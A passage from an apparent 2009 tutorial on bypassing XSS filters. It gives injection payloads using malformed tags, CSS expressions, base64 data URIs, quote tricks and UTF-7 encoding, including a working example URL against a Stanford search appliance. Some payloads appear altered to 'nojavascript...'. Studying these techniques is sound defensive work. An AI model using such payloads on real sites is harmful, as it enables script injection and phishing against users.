Technically, inside the IMG tag, the first two quotes should be considered encapsulation and should do nothing.The next quote should allow encapsulation and go to the next quote which is after the </SCRIPT> tag. Lastly, it should be closed by the trailing end angle bracket. But all major browsers, such as, IE, Firefox, Netscape, or Opera take this as malformed HTML and attempt to fix it. The output then looks like:

<img><script>alert('xss')</script>"&gt;

CSS Filter Evasion

HTML is a useful tool for injecting JavaScript, but not the only tool an even more complex sub-class of HTML is the style sheet or CSS. There are many different ways to inject XSS into style sheets, and even more ways to use them to inject JavaScript. . The simplest way to inject JavaScript into a CSS link tag is using the JavaScript directive.

<LINK REL="stylesheet" HREF="nojavascript...alert('XSS');">

However, IE has depreciated this as of 7.0, and it no longer works, you can still get it working in Opera and users who may still have IE 6.0 installed. Another way is to use the <STYLE> tag. It is rare that users have access to modify styles but it does happen. This is more common in cases of forums where users have access to the layout and design on their post. The following will work in IE and Netscape in the IE rendering engine mode: <STYLE> a { width: expression(alert('XSS')) } </STYLE> <A> Using the above as an example, you can see how the expression tag allows the attacker to inject JavaScript without using the JavaScript directive or the <SCRIPT> tag.

<DIV STYLE="width: expression(alert('XSS'));">

Obscure Filters

Let's take an example where a developer has taken user input and insured that it contains no quotes, no angle brackets, and no JavaScript directives. Still, it is not safe, as we can inject something called a data directive in this case, we have base64 encoded the simple string <script>alert('XSS')</script>.

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

The data directive allows us to inject entire documents inside a single string. The data directive works inside Firefox, Netscape in Gecko rendering engine mode, and Opera.

Using Double Quotes

If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents.

<IMG SRC=`nojavascript...alert("Look its, 'XSS'")`>

Escaping characters

Escaping quotes is sometimes usefull when there is an own written protection against XSS. This will allow you to escape the escape characters used by the XSS filter script.
It's worth mentioning that this will ONLY work if it's an own written (weak) defending script.

<IMG SRC=`nojavascript...alert(\"XSS\")`>

The result would be:

<IMG SRC=`nojavascript...alert(\\"XSS\\")`>

As you can see your own escape characters now filter out the escape characters used by the XSS protection.

Encoding

It is often assumed that if all angle brackets and quotes have been filtered that XSS is no longer possible. However XSS is reliant upon the browser, so as long as the browser can understand other encoding methods, you can run into situations where a browser will run commands without any of those characters.
A real world example of an XSS encoded vulnerability was found in Google search appliance by a hacker named Maluc. Maluc found that a normal Google search appliance query looked like:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-8&q=hi

He noticed that according to this string (oe=UTF-8) he could change the UTF code. He changed the UTF string from UTF-8 to UTF-7.
UTF-7 (7-bit Unicode Transformation Format) is a variable-length character encoding that was proposed for representing Unicode-encoded text using a stream of ASCII characters, for example for use in Internet e-mail messages. UTF-7 is generally not used as a native representation within applications as it is very awkward to process despite its size advantage over the combination of UTF-8 with either quoted-printable or base64.
Lets take for example:

<script>alert("XSS")</script>

And encode it using UTF-7:

+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-

Now all + have to be changed to URL code in a GET strings for this to work. So the URL code for + is %2B now we have:

%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-

URL encoding is turning a string into a safe block of text for appending on the query string of a URL.To encode characters to append to a URL, you use a percentage symbol, followed by the two-digit hex number representing that character.
For example:

Original character	Character Entity Reference
space	%20
/ (forward slash)	%2F
" (double quote)	%22
? (question mark)	%3F
+	%2B

With this Maluc came up with:

http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro">http://ask.stanford.edu/search?output=xml_no_dtd&client=stanford&pro xystylesheet=stanford&site=stanfordit&oe=UTF-7&q=%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-x

And was able to successfully execute an XSS script.
Of course the effect of the XSS is only temporary and only affects the user who go to that URL, but this could easily provide an avenue for phishing. In this way, Google appliance has hurt Stanford University's security by being placed on the same domain.
Written by Override and Killordie
References
Rsnake, XSS (Cross Site Scripting) Cheat
http://ha.ckers.org/xss.html [viewed 07/25/2009].

XSS (Cross Site Scripting) Prevention Cheat Sheet
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet [viewed 07/25/2009].
Xylitol (2008) Cross Site Scripting - Attack and Defense guide
http://milw0rm.com/papers/192 [viewed 07/25/2009].
Langy,XSS Guide - 1st Part
http://www.googlebig.com/forum/-en-xss-guide-1st-part-t-157.html [viewed 07/25/2009].